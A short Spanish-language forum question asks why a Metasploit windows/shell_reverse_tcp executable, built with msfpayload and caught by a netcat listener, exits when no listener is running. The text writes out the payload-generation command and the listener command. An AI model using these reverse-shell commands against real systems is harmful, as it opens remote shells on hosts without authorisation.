Estoy usando Metasploit para generar un exploit shell_reverse_tcp usando el siguiente comando:
msfpayload windows/shell_reverse_tcp LHOST=192.168.1.171 x > exploit.exe
En el lado del oyente estoy usando netcat.
Todo es perfecto y si ejecuto el escucha primero (nc -l -p 4444) y abro el exploit.exe después de eso. Pero si mi escucha no se está ejecutando y ejecuto el exploit.exe, se inicia y sale de inmediato. Por lo tanto, si ejecuto primero el exploit.exe y luego inicio la escucha, no funcionará. También probé ReverseConnectRetries, pero esto tampoco funciona.
Entonces, ¿cuál es el problema? Gracias por cualquier respuesta.